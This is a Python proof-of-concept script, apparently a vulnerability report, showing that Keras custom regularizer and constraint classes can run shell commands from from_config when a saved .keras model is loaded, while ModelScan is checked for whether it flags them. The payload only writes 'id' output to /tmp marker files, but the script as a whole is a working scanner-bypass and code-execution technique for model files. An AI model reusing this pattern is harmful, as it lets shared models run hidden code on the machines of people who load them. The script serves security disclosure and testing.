# Regularizer + Constraint from_config bypass
# Posted by: xiaoyaoes
# Ref: 9e64981
import tensorflow as tf, keras, os, sys
# Register both malicious classes with Keras's custom-object registry so that
# a model using them can be deserialized by name in this process.
@keras.saving.register_keras_serializable(package='MyReg')
class BadReg(tf.keras.regularizers.L2):
    """L2 regularizer whose ``from_config`` runs a shell command as a marker.

    Proof-of-concept fixture: deserializing this class writes the output of
    ``id`` to ``/tmp/REG_RCE``; the end of the script checks whether that
    file exists.
    """

    @classmethod
    def from_config(cls, config):
        # Side effect under test: /tmp/REG_RCE is created only if this runs.
        import os; os.system('id > /tmp/REG_RCE')
        # The saved `config` is ignored; a fixed l2=0.01 is always used.
        return super().from_config({'l2': 0.01})
@keras.saving.register_keras_serializable(package='MyConstr')
class BadConstr(tf.keras.constraints.MaxNorm):
    """MaxNorm constraint whose ``from_config`` runs a shell command as a marker.

    Proof-of-concept fixture: deserializing this class writes the output of
    ``id`` to ``/tmp/CONSTRAINT_RCE``; the end of the script checks whether
    that file exists.
    """

    @classmethod
    def from_config(cls, config):
        # Side effect under test: /tmp/CONSTRAINT_RCE is created only if this runs.
        import os; os.system('id > /tmp/CONSTRAINT_RCE')
        # The saved `config` is ignored; a fixed max_value=2.0 is always used.
        return super().from_config({'max_value': 2.0})
# Build a tiny functional model whose hidden Dense layer carries both custom
# objects, so their serialized configs end up in the saved .keras archive.
inputs = tf.keras.Input(shape=(5,))
x = tf.keras.layers.Dense(
    8,
    kernel_regularizer=BadReg(0.01),
    kernel_constraint=BadConstr(2.0),
    activation='relu',
)(inputs)
outputs = tf.keras.layers.Dense(1)(x)
model = tf.keras.Model(inputs, outputs)
model.save('model.keras')
print("Saved model.keras")
# Static scan of the saved archive using a ModelScan checkout at /tmp/modelscan.
# Inserting at position 0 makes that checkout win over any installed copy.
sys.path.insert(0, '/tmp/modelscan')
from modelscan.modelscan import ModelScan
from modelscan.settings import DEFAULT_SETTINGS

scanner = ModelScan(DEFAULT_SETTINGS)
r = scanner.scan('model.keras')
# Summarize the report as counts per section; a missing section counts as 0.
issue_count, error_count, skipped_count = (
    len(r.get(section, [])) for section in ('issues', 'errors', 'skipped')
)
print(f"ModelScan: I={issue_count} E={error_count} S={skipped_count}")
# Tear down this process's own copies of the custom classes before reloading.
# `del` only unbinds the module-level names: `register_keras_serializable`
# also stored the classes in Keras's global custom-object registry, which
# `load_model` consults when resolving class names. Without removing those
# entries, the load below would pick up BadReg/BadConstr from this process's
# memory rather than from anything in model.keras, so the markers would
# prove nothing about the file itself.
del model, BadReg, BadConstr
_custom_objects = keras.saving.get_custom_objects()  # live reference to the registry
for _registered_name in ('MyReg>BadReg', 'MyConstr>BadConstr'):
    _custom_objects.pop(_registered_name, None)
import gc; gc.collect()

# Clear markers left by previous runs so the checks reflect this load only.
for _marker in ('/tmp/REG_RCE', '/tmp/CONSTRAINT_RCE'):
    try:
        os.remove(_marker)
    except FileNotFoundError:
        pass

try:
    loaded = tf.keras.models.load_model('model.keras', safe_mode=False)
except (TypeError, ValueError) as err:
    # Presumably raised when the archive names classes this process can no
    # longer resolve (TypeError in Keras 3, ValueError in older tf.keras --
    # confirm for the installed version). Report it and continue so the
    # marker checks below still print.
    loaded = None
    print(f"load_model failed: {type(err).__name__}: {err}")
print(f"Regularizer RCE: {os.path.exists('/tmp/REG_RCE')}")
print(f"Constraint RCE: {os.path.exists('/tmp/CONSTRAINT_RCE')}")